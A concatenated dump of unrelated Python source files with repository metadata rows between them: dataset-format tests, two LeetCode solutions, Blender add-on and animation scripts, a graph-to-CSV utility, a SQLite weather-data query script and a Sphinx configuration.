with TestDir() as test_dir:
self._test_can_save_voc(
SrcExtractor(), VocConverter(label_map='guess'),
test_dir.path, target_extractor=DstExtractor())
def test_dataset_with_fixed_labelmap(self):
class SrcExtractor(Extractor):
def __iter__(self):
yield DatasetItem(id=1, annotations=[
BboxObject(2, 3, 4, 5, label=0, id=1),
BboxObject(1, 2, 3, 4, label=1, id=2, group=2,
attributes={'act1': True}),
BboxObject(2, 3, 4, 5, label=2, id=3, group=2),
BboxObject(2, 3, 4, 6, label=3, id=4, group=2),
])
def categories(self):
label_cat = LabelCategories()
label_cat.add('foreign_label')
label_cat.add('label', attributes=['act1', 'act2'])
label_cat.add('label_part1')
label_cat.add('label_part2')
return {
AnnotationType.label: label_cat,
}
label_map = {
'label': [None, ['label_part1', 'label_part2'], ['act1', 'act2']]
}
class DstExtractor(Extractor):
def __iter__(self):
yield DatasetItem(id=1, annotations=[
BboxObject(1, 2, 3, 4, label=0, id=2, group=2,
attributes={'act1': True, 'act2': False}),
BboxObject(2, 3, 4, 5, label=1, id=3, group=2),
BboxObject(2, 3, 4, 6, label=2, id=4, group=2),
])
def categories(self):
return VOC.make_voc_categories(label_map)
with TestDir() as test_dir:
self._test_can_save_voc(
SrcExtractor(), VocConverter(label_map=label_map),
test_dir.path, target_extractor=DstExtractor())
class VocImporterTest(TestCase):
def test_can_import(self):
with TestDir() as test_dir:
dummy_dir = osp.join(test_dir.path, 'dummy')
subsets = generate_dummy_voc(dummy_dir)
dataset = Project.import_from(dummy_dir, 'voc').make_dataset()
self.assertEqual(len(VOC.VocTask), len(dataset.sources))
self.assertEqual(set(subsets), set(dataset.subsets()))
self.assertEqual(
sum([len(s) for _, s in subsets.items()]),
len(dataset))
class VocFormatTest(TestCase):
def test_can_write_and_parse_labelmap(self):
src_label_map = VOC.make_voc_label_map()
src_label_map['qq'] = [None, ['part1', 'part2'], ['act1', 'act2']]
with TestDir() as test_dir:
file_path = osp.join(test_dir.path, 'test.txt')
VOC.write_label_map(file_path, src_label_map)
dst_label_map = VOC.parse_label_map(file_path)
self.assertEqual(src_label_map, dst_label_map) | [
"[email protected]"
] | |
28735579103adaecd3f593cd35e4b4f802cb9c28 | d7e0b198c216fc877ec94c4279d837bfbc6bccfc | /linkedlist/PartitionLinkedList.py | 8167452d449622e2bbb3d9c338d1a821e2931df0 | [
"MIT"
] | permissive | choiking/LeetCode | dcdb467e25ad6455156a9e2620dd98fabdf9c28b | 08a7ad6af2449e4268fce86823cbf667bbed2ae8 | refs/heads/master | 2021-07-11T15:46:01.841530 | 2017-10-12T23:34:45 | 2017-10-12T23:34:45 | 107,908,853 | 1 | 0 | null | 2017-10-22T22:48:30 | 2017-10-22T22:48:30 | null | UTF-8 | Python | false | false | 936 | py | # Definition for singly-linked list.
# Given a linked list and a value x, partition it such that all nodes less than x come before nodes greater than or equal to x.
# You should preserve the original relative order of the nodes in each of the two partitions.
# Given 1->4->3->2->5->2 and x = 3,
# return 1->2->2->4->3->5.
#思路
#设置两个guardnode
#然后制造两个temp node用于循环
#将第一个链表的末尾指向第二个的开头,返还第一个guardnode.next
class Solution(object):
def partition(self, head, x):
small, large = ListNode(0), ListNode(0)
cur1, cur2 = small, large
while head:
if head.val < x:
cur1.next = head
cur1 = cur1.next
else:
cur2.next = head
cur2 = cur2.next
head = head.next
cur2.next = None
cur1.next = large.next
return small.next
| [
"[email protected]"
] | |
956bc15b1abb68df95f0d064267eda4a0caead0b | 4face76e61792656870d79740d46c3350a22e2c5 | /MedianOfTwoSortedArrays.py | 4d3c3e2a2c3040dfc8101c10b7a2f67b2b6e3917 | [] | no_license | juhideshpande/LeetCode | 268d0b8d3557d558d7dbd11ba598eaa09f16c515 | 0be5b51e409ae479284452ab24f55b7811583653 | refs/heads/master | 2023-02-17T23:26:43.326424 | 2021-01-21T04:38:05 | 2021-01-21T04:38:05 | 271,307,655 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,371 | py | class Solution(object):
def findMedianSortedArrays(self, nums1, nums2):
"""
:type nums1: List[int]
:type nums2: List[int]
:rtype: float
"""
m, n = len(nums1), len(nums2)
if (m > n):
return self.findMedianSortedArrays(nums2, nums1)
half = (m + n) / 2
lo, hi = 0, m
while lo <= hi:
i = lo + (hi - lo) / 2
j = half - i
if i > lo and nums1[i - 1] > nums2[j]:
hi = i - 1
elif i < hi and nums2[j - 1] > nums1[i]:
lo = i + 1
else:
if i == m:
minRight = nums2[j]
elif j == n:
minRight = nums1[i]
else:
minRight = min(nums2[j], nums1[i])
if (m + n) % 2 != 0: # If there are odd elements.
return minRight
if i == 0:
maxLeft = nums2[j - 1]
elif j == 0:
maxLeft = nums1[i - 1]
else:
maxLeft = max(nums1[i - 1], nums2[j - 1])
return (maxLeft + minRight) * 0.5
# Time Complexity O(log(min(m,n))) Space Complexity: O(1)
| [
"[email protected]"
] | |
420c189fce6c75d1524cf77d368de8fba5389406 | 2019f400e7f081ea49103e9896824185f26faf9c | /coa_tools/operators/slot_handling.py | 73e83719bb5015e3d19044b429c8952a8f394915 | [] | no_license | Takuyax/myblendercontrib | 7c9636d8acfc1aa75889a8e53af7768759a6cd56 | c465a75bce6f7d096cca22076c4c3e92b0045106 | refs/heads/master | 2020-06-22T20:44:26.936818 | 2019-07-18T04:33:47 | 2019-07-18T04:33:47 | 198,394,845 | 0 | 0 | null | 2019-07-23T09:11:12 | 2019-07-23T09:11:11 | null | UTF-8 | Python | false | false | 9,905 | py | '''
Copyright (C) 2015 Andreas Esau
[email protected]
Created by Andreas Esau
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import bpy
import bpy_extras
import bpy_extras.view3d_utils
from math import radians
import mathutils
from mathutils import Vector, Matrix, Quaternion
import math
import bmesh
from bpy.props import FloatProperty, IntProperty, BoolProperty, StringProperty, CollectionProperty, FloatVectorProperty, EnumProperty, IntVectorProperty
import os
from bpy_extras.io_utils import ExportHelper, ImportHelper
import json
from bpy.app.handlers import persistent
from .. import functions
class COATOOLS_OT_ExtractSlots(bpy.types.Operator):
bl_idname = "coa_tools.extract_slots"
bl_label = "Extract Slots"
bl_description = ""
bl_options = {"REGISTER"}
@classmethod
def poll(cls, context):
return True
def execute(self, context):
obj = context.active_object
active_collection = bpy.data.collections[context.scene.coa_tools.active_collection]
if obj.type == "MESH" and obj.coa_tools.type == "SLOT":
for i,slot in enumerate(obj.coa_tools.slot):
name = obj.name +"_"+ str(i).zfill(2)
ob = obj.copy()
functions.link_object(context, ob)
ob.name = name
ob.coa_tools.type = "MESH"
ob.data = slot.mesh
for slot in ob.coa_tools.slot:
ob.coa_tools.slot.remove(0)
ob.matrix_world = obj.matrix_world
ob.parent = obj.parent
ob.select_set(True)
context.view_layer.objects.active = ob
active_collection.objects.unlink(obj)
bpy.data.objects.remove(obj)
return {"FINISHED"}
class COATOOLS_OT_CreateSlotObject(bpy.types.Operator):
bl_idname = "coa_tools.create_slot_object"
bl_label = "Create Slot Object"
bl_description = ""
bl_options = {"REGISTER"}
@classmethod
def poll(cls, context):
return True
slot_name: StringProperty(name="Slot Name")
keep_sprite_position: BoolProperty(name="Keep Sprite Position",description="Keeps the sprite at current position by applying a new origin.",default=True)
def draw(self,context):
layout = self.layout
if context.active_object.coa_tools.type == "MESH":
layout.prop(self,"slot_name")
layout.prop(self,"keep_sprite_position")
def invoke(self,context,event):
wm = context.window_manager
return wm.invoke_props_dialog(self)
def objects_are_valid(self,context):
count = 0
for obj in context.selected_objects:
if obj.type != "MESH":
return False
else:
count += 1
if count > 1:
return True
else:
return False
def execute(self, context):
if not self.objects_are_valid(context):
self.report({'INFO'},"Please select at least to Sprites to combine into a slot.")
return{"CANCELLED"}
active_collection = bpy.data.collections[context.scene.coa_tools.active_collection]
name = str(context.active_object.name)
init_obj = bpy.data.objects[context.active_object.name]
objs = context.selected_objects[:]
obj = context.active_object.copy()
functions.link_object(context, obj)
context.view_layer.objects.active = obj
if obj.coa_tools.type == "MESH":
name = self.slot_name
obj.name = self.slot_name
if self.keep_sprite_position:
print("test")
for ob in objs:
slots = []
if ob.coa_tools.type == "MESH":
slots = [ob.data]
elif ob.coa_tools.type == "SLOT":
for slot in ob.coa_tools.slot:
slots.append(slot.mesh)
ob.location[1] = obj.location[1]
for i,slot in enumerate(slots):
ob_tmp = ob.copy()
functions.link_object(context, ob_tmp)
ob_tmp.data = slot
ob_tmp.select_set(True)
### deselect all objects, select the current from iteration
bpy.ops.object.select_all(action='DESELECT')
ob_tmp.select_set(True)
context.view_layer.objects.active = ob_tmp
cursor_location = Vector(context.scene.cursor.location)
context.scene.cursor.location = obj.matrix_world.to_translation()
bpy.ops.object.origin_set(type='ORIGIN_CURSOR')
context.scene.cursor.location = cursor_location
active_collection.objects.unlink(ob_tmp)
bpy.data.objects.remove(ob_tmp)
cursor_location = Vector(context.scene.cursor.location)
context.scene.cursor.location = obj.matrix_world.to_translation()
bpy.ops.object.origin_set(type='ORIGIN_CURSOR')
context.scene.cursor.location = cursor_location
obj.select_set(True)
context.view_layer.objects.active = obj
obj.coa_tools.type = "SLOT"
for sprite in objs:
if sprite != obj:
if sprite.type == "MESH":
item = None
if sprite.coa_tools.type == "MESH":
if sprite.data.name not in obj.coa_tools.slot:
item = obj.coa_tools.slot.add()
else:
item = obj.coa_tools.slot[sprite.data.name]
item.mesh = sprite.data
#item.name = sprite.data.name
item.index = len(obj.coa_tools.slot)-1
if sprite == init_obj:
obj.coa_tools.slot_index = item.index
obj.coa_tools.slot_reset_index = item.index
elif sprite.coa_tools.type == "SLOT" and sprite != init_obj:
for slot in sprite.coa_tools.slot:
item = obj.coa_tools.slot.add()
#item.name = slot.name
item.mesh = slot.mesh
if item != None:
item["active"] = False
obj.coa_tools.slot[0].active = True
### delete original sprite
for sprite in objs:
active_collection.objects.unlink(sprite)
bpy.data.objects.remove(sprite,do_unlink=True)
for i,s in enumerate(obj.coa_tools.slot):
s.index = i
obj.name = name
return {"FINISHED"}
class COATOOLS_OT_MoveSlotItem(bpy.types.Operator):
bl_idname = "coa_tools.move_slot_item"
bl_label = "Move Slot Item"
bl_description = ""
bl_options = {"REGISTER"}
idx: IntProperty()
ob_name: StringProperty()
mode: StringProperty()
@classmethod
def poll(cls, context):
return True
def execute(self, context):
obj = bpy.data.objects[self.ob_name]
if self.mode == "UP":
new_idx = max(self.idx-1,0)
obj.coa_tools.slot.move(self.idx,new_idx)
elif self.mode == "DOWN":
new_idx = min(self.idx+1,len(obj.coa_tools.slot)-1)
obj.coa_tools.slot.move(self.idx,new_idx)
for i,s in enumerate(obj.coa_tools.slot):
s.index = i
return {"FINISHED"}
class COATOOLS_OT_RemoveFromSlot(bpy.types.Operator):
bl_idname = "coa_tools.remove_from_slot"
bl_label = "Remove From Slot"
bl_description = ""
bl_options = {"REGISTER"}
idx: IntProperty()
ob_name: StringProperty()
@classmethod
def poll(cls, context):
return True
def execute(self, context):
obj = bpy.data.objects[self.ob_name]
active_collection = bpy.data.collections[context.scene.coa_tools.active_collection]
slot = obj.coa_tools.slot[self.idx]
active_idx = 0
for i,s in enumerate(obj.coa_tools.slot):
if s.active:
active_idx = i
break
obj.coa_tools.slot.remove(self.idx)
active_idx = max(0,(active_idx - 1))
for i,s in enumerate(obj.coa_tools.slot):
s["index"] = i
if len(obj.coa_tools.slot) > 0:
obj.coa_tools.slot[active_idx].active = True
else:
active_collection.objects.unlink(obj)
bpy.data.objects.remove(obj)
# for s in obj.coa_tools.slot:
# if s.index > self.idx:
# s["index"] -= 1
return {"FINISHED"}
| [
"[email protected]"
] | |
c71c927d0ad65e56c35ab4e162cb2d2081b53863 | 371fe9a1fdeb62ad1142b34d732bde06f3ce21a0 | /scripts/make_loop_csv.py | a5b00e1e0c6eb16100a6d2b9acdbb25263ecf479 | [] | no_license | maickrau/rdna_resolution | 971f3b7e803565c9432be69b8e2a2852f55b8b79 | aab42310c31e655cbbc318331082fa3436d69075 | refs/heads/master | 2023-03-03T05:14:33.966930 | 2021-02-17T20:45:20 | 2021-02-17T20:45:20 | 339,851,442 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,049 | py | #!/usr/bin/python
import sys
graphfile = sys.argv[1]
# loops from stdin
# csv to stdout
node_lens = {}
with open(graphfile) as f:
for l in f:
parts = l.strip().split('\t')
if parts[0] == 'S':
node_lens[parts[1]] = len(parts[2])
lines = []
column_vals = {}
for node in node_lens:
column_vals[node] = set()
for l in sys.stdin:
parts = l.strip().split('\t')
name = parts[0]
nodes = set(parts[1].replace('>', ' ').replace('<', ' ').split(' '))
this_line = [name]
nodestr = name
for node in node_lens:
if node in nodes:
this_line.append(str(node_lens[node]))
column_vals[node].add(node_lens[node])
else:
this_line.append("0")
column_vals[node].add(0)
lines.append(this_line)
header = "node"
for node in node_lens:
if len(column_vals[node]) == 1: continue
header += "," + node
print(header)
for line in lines:
linestr = line[0]
index = 0
for node in node_lens:
index += 1
if len(column_vals[node]) == 1: continue
linestr += "," + line[index]
print(linestr)
| [
"[email protected]"
] | |
a17935821a8b08c407e1e1c9f6530ba43580d57f | e9f3abc6b50c07239264b7d2433fb8624a6dfae8 | /HydroDataDownload/ReadDatabase_SURF_CLI_CHN_MUL_DAY.py | 84e97bbd80d7ea3b137e1e8610a358b480a0321a | [] | no_license | alameday/Python | d41f3cb25a67ac6fec9047a46de91d340b99cc92 | 59251eb9b429750040f3fa57c4fdfd2ac8419380 | refs/heads/master | 2020-04-07T01:26:09.759387 | 2018-10-08T03:34:14 | 2018-10-08T03:34:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,468 | py | #! /usr/bin/env python
# coding=utf-8
# Func. : Read Database of SURF_CLI_CHN_MUL_DAY_V3.0
# Author: Liangjun Zhu
# Date : 2016-4-11
# Email : [email protected]
# Blog : http://zhulj.net/python/2016/04/11/Constructing-SURF_CLI_CHN_MUL_DAY_V3.0-database.html
import datetime
import os
import sqlite3
def get_conn(path):
"""
get connection of Sqlite
:param path: path of Sqlite database
"""
conn = sqlite3.connect(path)
if os.path.exists(path) and os.path.isfile(path):
# print('database in hardware :[{}]'.format(path))
return conn
else:
conn = None
# print('database in memory :[:memory:]')
return sqlite3.connect(':memory:')
def get_cursor(conn):
"""
get cursor of current connection
:param conn: connection of Sqlite
"""
if conn is not None:
return conn.cursor()
else:
return get_conn('').cursor()
def close_all(conn, cu):
"""
close connection and cursor of Sqlite
:param conn: connection of Sqlite
:param cu: cursor of conn
"""
try:
if cu is not None:
cu.close()
finally:
if cu is not None:
cu.close()
def getTablesList(dbpath):
"""
Get all tables' name in Sqlite database
:param dbpath:
:return: table names
"""
conn = sqlite3.connect(dbpath)
cu = get_cursor(conn)
tabs = cu.execute(
"select name from sqlite_master where type = 'table' order by name").fetchall()
tabList = list()
for tab in tabs:
if len(tab[0]) == 6:
tabList.append(tab[0])
close_all(conn, cu)
return tabList
def fetchData(conn, sql):
"""
Query data by sql
:param conn:
:param sql:
:return: data queried
"""
data = list()
if sql is not None and sql != '':
cu = get_cursor(conn)
cu.execute(sql)
r = cu.fetchall()
if len(r) > 0:
for e in range(len(r)):
# print(r[e])
data.append(r[e])
else:
print('the [{}] is empty or equal None!'.format(sql))
return data
def saveToCSV(data, csvPath, flag='climData'):
f = open(csvPath, "w")
title = ''
if flag == 'climData':
title = 'stationID,datetimeBJ,avgPRS,maxPRS,minPRS,avgTEM,maxTEM,minTEM,' \
'avgRHU,minRHU,PRE208,PRE820,PRE,smEVP,lgEVP,avgWIN,maxWIN,maxWINASP,' \
'extWIN,extWINASP,SSD,avgGST,maxGST,minGST\n'
elif flag == 'stationInfo':
title = 'stationID,lat,lon,alti\n'
f.write(title)
for items in data:
itemsStr = ''
if flag == 'stationInfo':
items = items[0]
for item in items:
itemsStr += str(item)
itemsStr += ','
itemsStr = itemsStr[:-1]
itemsStr += '\n'
f.write(itemsStr)
f.close()
def isNum(value):
try:
x = int(value)
except TypeError:
return False
except ValueError:
return False
except Exception:
return False
else:
return True
def QueryDatabase(dbpath, savePath, stationIDs, startTime, endTime):
"""
Query and save data from Sqlite database
:param dbpath:
:param savePath:
:param stationIDs:
:param startTime:
:param endTime:
:return:
"""
tableList = getTablesList(dbpath)
conn = sqlite3.connect(dbpath)
if not os.path.isdir(savePath):
os.mkdir(savePath)
stationInfoCSVPath = savePath + os.sep + 'stationInfo.csv'
stationInfoData = list()
if stationIDs == list():
stationIDs = getTablesList(dbpath)
else:
for i in range(len(stationIDs)):
if isNum(stationIDs[i]):
stationIDs[i] = 'S' + str(stationIDs[i])
else:
stationIDs[i] = 'S' + stationIDs[i]
for tabName in stationIDs:
# tabName = 'S' + stationID
stationID = tabName[1:]
if tabName in tableList:
csvPath = savePath + os.sep + tabName + '.csv'
startT = datetime.datetime(startTime[0], startTime[1], startTime[2])
endT = datetime.datetime(endTime[0], endTime[1], endTime[2])
endT += datetime.timedelta(days=1)
startTStr = startT.strftime("%Y-%m-%d %H:%M:%S")[:10]
endTStr = endT.strftime("%Y-%m-%d %H:%M:%S")[:10]
fetch_data_sql = '''SELECT * FROM %s WHERE date BETWEEN "%s" AND
"%s" ORDER BY date''' % (tabName, startTStr, endTStr)
# print(fetch_data_sql)
data = fetchData(conn, fetch_data_sql)
saveToCSV(data, csvPath)
fetch_station_sql = '''SELECT * FROM stationInfo WHERE stID=%s ''' % stationID
stationInfoData.append(fetchData(conn, fetch_station_sql))
saveToCSV(stationInfoData, stationInfoCSVPath, 'stationInfo')
conn.close()
if __name__ == '__main__':
# Input parameters
SQLITE_DB_PATH = r'C:\z_data\common_GIS_Data\SURF_CLI_CHN_MUL_DAY_V3.0\test.db'
QUERY_STATION_IDs = [59981]
QUERY_DATE_FROM = [1960, 1, 1] # format: Year, Month, Day
QUERY_DATE_END = [2017, 12, 31]
SAVE_PATH = r'D:\tmp\zhulj'
QueryDatabase(SQLITE_DB_PATH, SAVE_PATH, QUERY_STATION_IDs, QUERY_DATE_FROM, QUERY_DATE_END)
| [
"[email protected]"
] | |
0c5d394822fa436e1d98a5195894e6c3d859197d | 6fcfb638fa725b6d21083ec54e3609fc1b287d9e | /python/automl_HPOlib/HPOlib-master/docs/source/conf.py | 9f3a4a9d2e6b16ee3550f719177d575f8b6c7a61 | [] | no_license | LiuFang816/SALSTM_py_data | 6db258e51858aeff14af38898fef715b46980ac1 | d494b3041069d377d6a7a9c296a14334f2fa5acc | refs/heads/master | 2022-12-25T06:39:52.222097 | 2019-12-12T08:49:07 | 2019-12-12T08:49:07 | 227,546,525 | 10 | 7 | null | 2022-12-19T02:53:01 | 2019-12-12T07:29:39 | Python | UTF-8 | Python | false | false | 8,877 | py | # -*- coding: utf-8 -*-
#
# HPOlib documentation build configuration file, created by
# sphinx-quickstart on Fri Oct 17 17:39:41 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.todo',
'sphinx.ext.coverage',
'sphinx.ext.mathjax',
'sphinx.ext.viewcode',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'HPOlib'
copyright = u'2014, Matthias Feurer, Katharina Eggensperger'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0'
# The full version, including alpha/beta/rc tags.
release = '1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'HPOlibdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'HPOlib.tex', u'HPOlib Documentation',
u'Matthias Feurer, Katharina Eggensperger', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'hpolib', u'HPOlib Documentation',
[u'Matthias Feurer, Katharina Eggensperger'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'HPOlib', u'HPOlib Documentation',
u'Matthias Feurer, Katharina Eggensperger', 'HPOlib', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# -- Mock modules with C extensions according to ReadTheDocs.com
# https://docs.readthedocs.org/en/latest/faq.html?highlight=numpy
import sys
from mock import Mock as MagicMock
class Mock(MagicMock):
@classmethod
def __getattr__(cls, name):
return Mock()
MOCK_MODULES = ['argparse', 'numpy', 'pandas', 'scipy', 'numpy.distutils',
'numpy.distutils.core', 'matplotlib', 'numpy.distutils.core']
sys.modules.update((mod_name, Mock()) for mod_name in MOCK_MODULES) | [
"[email protected]"
] | |
be7e2605e2a665d952cbcf3b01736709b9ac7bc0 | af5d9d3d1596ada9e3d162d12912f03c58305de3 | /scripts/Conference2021.py | 42e26e1a6bc45d8969d39a1d4d10e0d17cb00983 | [] | no_license | Oz-Oguz/bpy-scripting | 8db40c6750aeae8740269621ad9fda754df8fb89 | 938f9eb2b76d26009af252457601db018cb428f2 | refs/heads/main | 2023-08-23T05:36:08.046618 | 2021-10-14T11:12:09 | 2021-10-14T11:14:07 | 366,370,457 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 9,303 | py | import bpy
import bmesh
import numpy as np
import sys, os
import re
import time
dirname = os.path.dirname(os.path.realpath(__file__+"/.."))
sys.path.append(dirname)
from src.Utils import *
from src.RaiAnim import *
from src.Camera import *
time_start_script = time.process_time()
########################################################
# CUSTOM SETTINGS
########################################################
Nsegments = 2 #display N segments. -1: display all segments
NkeyframeSteps = 10 #use every n-th keyframe, interpolate inbetween
# renderAnimation = True
renderAnimation = False
doZoom=True
tPaddingEnd = 250 #number of frames to append after algorithms converged
tZoomStart = 100 ##frame at which we start to rotate camera
tZoomOutDuration = 25
tRotationStart = tZoomStart + 200
cameraLocation = Vector((-6,-12,+5))
cameraFocusPoint = Vector((0,0,0))
folder = "data/animations/20210215_141740/"
folder = "data/animations/20210216_001730/"
folder = "data/animations/20210216_204609/" ## tower, 4agents, 1crane
folder = "data/animations/20210218_214753/" ##pyramid
folder = "data/animations/Julius_well/" ## well (Julius, 2 agents)
folder = "data/animations/20210223_192210/" ##FIT building, 6 agents
folder = "data/animations/20210223_112459/" ## well (valentin, 6 agents)
folder = "data/animations/20210218_173654/" ## wall
folder = "data/animations/20210221_004210/" ## tower
folder = "data/animations/20210226_124540/" ## tower (4kuka, 4mobile)
folder = "data/animations/20210226_130645/" ## tower (4kuka, 4mobile, 1crane)
folder = "data/animations/fit/" ##final FIT (6+6 agents)
folder = "data/animations/wall/" ##final wall (6+6 agents)
folder = "data/animations/20210226_135839/" ## tower (right colors)
folder = "data/animations/handover/" ##Final Tower Handover
folder = "data/animations/all_robots/" ##Group Picture
filename = os.path.basename(os.path.dirname(folder))
if "fit" in filename:
tZoomOutDuration = 35
if "20210226_135839" in filename:
tZoomOutDuration = 40
if "handover" in filename:
doZoom=False
cameraLocation = Vector((-14,-20,+9))
tRotationStart = 0
tZoomOutDuration = 40
bpy.ops.object.select_all(action='SELECT')
bpy.ops.object.delete()
########################################################
# Load collada file and preprocess the objects
########################################################
fname = os.path.abspath(dirname+"/" + folder + "initial.dae")
A = Anim(folder + "/Anim.txt")
c = bpy.ops.wm.collada_import(filepath=fname, import_units=True, auto_connect=False)
bpy.ops.object.select_all(action='SELECT')
objs = bpy.context.selected_objects
curves = {}
for obj in objs:
if "gripper" in obj.name:
curveDynamic = addBezierCurve(obj.name)
curves[obj.name] = curveDynamic
obj.location = [0,-1000,-1000]
if obj.name == "plate":
bpy.context.scene.frame_set(0)
obj.location = [0,0,-0.15]
obj.rotation_mode = 'QUATERNION'
obj.rotation_quaternion = [1,0,0,0]
obj.parent = None
obj.keyframe_insert(data_path="location", index=-1)
obj.keyframe_insert(data_path="rotation_quaternion", index=-1)
# addMaterialConcrete(obj)
addMaterialColor(obj, (0.6,0.6,0.6,1.0))
########################################################
# Load collada file and preprocess the objects
########################################################
setBackgroundColor((.2,.2,.2))
bpy.ops.object.select_all(action='SELECT')
ctr = 0
bpy.context.scene.frame_start = 0
bpy.context.scene.frame_end = 0
for segment in A.segments:
if ctr > Nsegments and Nsegments >= 0:
break
ctr = ctr + 1
for n in range(0,len(segment.names)):
name = segment.names[n]
if segment.timeEnd > bpy.context.scene.frame_end:
bpy.context.scene.frame_end = segment.timeEnd
print("Import segment %d/%d [time %d,%d] (link %s %d/%d)"\
%(ctr,(Nsegments+1 if Nsegments>=0 else len(A.segments)),
segment.timeStart,segment.timeEnd, name, n,len(segment.names)))
for obj in bpy.context.selected_objects:
if obj.name != name:
continue
if "coll" in name:
continue
# if '_' in obj.name:
# continue
## FIXED CURVE FOR DEBUGGING
# if obj.name == name and "gripper" in obj.name:
# T = range(segment.timeStart, segment.timeEnd)
# Ng = len(T)-1
# curveObject = addBezierCurve(obj.name+"trail", Ng, 0.005)
# P = curveObject.data.splines[0].points
# for t in T:
